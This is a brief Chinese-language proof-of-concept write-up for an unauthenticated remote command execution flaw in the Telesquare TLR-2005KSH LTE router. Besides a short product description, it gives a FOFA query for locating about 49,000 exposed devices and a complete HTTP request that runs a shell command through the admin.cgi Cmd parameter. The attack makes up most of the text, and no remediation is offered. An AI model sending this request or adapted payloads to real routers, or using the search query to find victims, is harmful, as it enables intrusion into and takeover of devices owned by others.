产品简介
Telesquare Tlr-2005Ksh是韩国Telesquare(Telesquare)公司的一款Sk电讯Lte(Lte)路由器。
漏洞概述
Telesquare TLR-2005Ksh 1.0.0和1.1.4版本存在未经授权的远程命令执行漏洞。攻击者可以利用此漏洞在未经Cmd参数授权的情况下执行系统命令并获取服务器权限,
复现环境
fofa
app="TELESQUARE-TLR-2005KSH"
资产数:49,437
影响版本
1.0.0< version < 1.1.4
漏洞复现
PoC
GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ls%20-la HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.55
Connection: close
Accept: */*
Accept-Encoding: gzip